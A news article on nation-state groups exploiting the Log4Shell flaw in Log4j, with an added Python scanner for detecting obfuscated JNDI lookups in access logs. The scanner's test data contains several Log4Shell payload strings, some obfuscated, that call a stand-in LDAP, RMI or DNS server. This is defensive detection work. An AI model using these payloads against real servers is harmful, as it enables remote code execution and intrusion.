16 December 2021

Microsoft: State-sponsored hackers from China, Iran, North Korea and Turkey target the Log4Shell bug

State-sponsored hacker groups from China, Iran, North Korea and Turkey have been spotted exploiting the recently disclosed CVE-2021-44228 vulnerability (aka “Log4Shell”) in the Log4j logging utility to gain access to enterprise networks.

CVE-2021-44228 is an unauthenticated remote code execution vulnerability in the JNDI lookup feature of Log4j 2. When a logged string contains an attacker-controlled lookup of the form ${jndi:ldap://<attacker server>/a}, Log4j resolves it, connects to the named LDAP (or RMI, DNS or other JNDI-backed) server and can load and run a Java class that server returns, which lets threat actors hijack servers and applications over the internet. The disclosure caused widespread alarm because Log4j is embedded in a vast number of commonly deployed enterprise systems. The flaw affects all versions of Log4j 2 from 2.0-beta9 (released in September 2013) to 2.14.1 (March 2021).
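The lookup mechanism described above is what defenders end up hunting for in web-server and application logs, and attackers quickly began hiding the ${jndi:...} string behind nested Log4j lookups. The Python below is an added example, not code from the article or from Microsoft: it normalises the common obfuscations (${lower:..}, ${upper:..} and ${..:-..} default-value lookups) and then flags any string that resolves to a ${jndi:<scheme>:...} lookup. The access-log lines, the client addresses and the 198.51.100.7 callback address are constructed test data.

```python
import re

# Constructed sample access-log lines for testing (not real traffic; the
# 198.51.100.7 address is from the RFC 5737 documentation range).
SAMPLE_LINES = [
    '10.0.0.5 - - [10/Dec/2021:20:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.6 - - [10/Dec/2021:20:01:03 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/a}"',
    '10.0.0.7 - - [10/Dec/2021:20:01:04 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.7:1099/x}"',
    '10.0.0.8 - - [10/Dec/2021:20:01:05 +0000] "GET /login HTTP/1.1" 200 512 "-" '
    '"${${env:NOTEXIST:-j}ndi:dns://198.51.100.7/x}"',
    '10.0.0.9 - - [10/Dec/2021:20:01:06 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.0.10 - - [10/Dec/2021:20:01:07 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${date:yyyy}"',
]

# Innermost-first rewrites for the obfuscations seen in the wild:
#   ${lower:X} -> x, ${upper:X} -> X, ${anything:-X} and ${::-X} -> X
_LOWER = re.compile(r"\$\{lower:([^${}]*)\}", re.IGNORECASE)
_UPPER = re.compile(r"\$\{upper:([^${}]*)\}", re.IGNORECASE)
_DEFAULT = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
# What remains after normalisation if the string was a JNDI lookup.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def deobfuscate(text: str, max_rounds: int = 20) -> str:
    """Collapse nested Log4j lookups until the string stops changing.

    Only lookups that can be evaluated without a live Log4j runtime are
    resolved; a genuine ${jndi:...} is left intact so it can be matched.
    """
    for _ in range(max_rounds):
        new = _LOWER.sub(lambda m: m.group(1).lower(), text)
        new = _UPPER.sub(lambda m: m.group(1).upper(), new)
        new = _DEFAULT.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def jndi_scheme(line: str):
    """Return the JNDI scheme ('ldap', 'rmi', 'dns', ...) if the line carries
    a Log4Shell lookup after de-obfuscation, otherwise None."""
    m = _JNDI.search(deobfuscate(line))
    return m.group(1).lower() if m else None


def scan(lines):
    """Return (line index, scheme) for every line containing a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines):
        scheme = jndi_scheme(line)
        if scheme:
            hits.append((i, scheme))
    return hits


if __name__ == "__main__":
    for idx, scheme in scan(SAMPLE_LINES):
        print(f"line {idx}: JNDI lookup via {scheme} -> "
              f"{deobfuscate(SAMPLE_LINES[idx])}")
```

Run against the constructed sample, the scanner flags the first four lines (ldap, ldap, rmi, dns) and ignores the ordinary User-Agent and the benign ${date:yyyy} lookup. It covers the obfuscations that were most common in the first days of exploitation, but not every variant (URL-encoded payloads, payloads split across several headers, or lookups that only a running Log4j could evaluate), so treat a hit as one signal alongside egress-connection and process-creation telemetry rather than as the sole detection.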

This week, the Apache Software Foundation (ASF) released a further fix for the Log4j logging utility, version 2.16.0, after it was found that the previous patch (2.15.0) "was incomplete in certain non-default configurations." The residual issue is tracked as CVE-2021-45046.

As Microsoft noted in an update on its Log4Shell guidance blog post, “this activity ranges from experimentation during development, integration of the vulnerability to in-the-wild payload deployment, and exploitation against targets to achieve the actor’s objectives.”

Threat actors linked to the Log4Shell attacks include the Iran-linked APT group known as PHOSPHORUS, and HAFNIUM, a state-backed hacker group believed to have ties to the Chinese government. Microsoft did not name the threat groups operating out of North Korea and Turkey.

“MSTIC has observed PHOSPHORUS, an Iranian actor that has been deploying ransomware, acquiring and making modifications of the Log4j exploit. We assess that PHOSPHORUS has operationalized these modifications,” the tech giant noted.

As for HAFNIUM, the group has been observed abusing the flaw to attack virtualization infrastructure.

“In these attacks, HAFNIUM-associated systems were observed using a DNS service typically associated with testing activity to fingerprint systems,” Microsoft said.

Furthermore, multiple groups acting as access brokers have also been observed leveraging Log4Shell to gain initial access to target networks. These brokers then sell that access to ransomware-as-a-service affiliates. Exploitation attempts were observed on both Windows and Linux systems, Microsoft said.

On Monday, security firm Bitdefender warned that it had seen the first ransomware delivered via the Log4Shell flaw, a new strain called "Khonsari" dropped on unpatched systems.
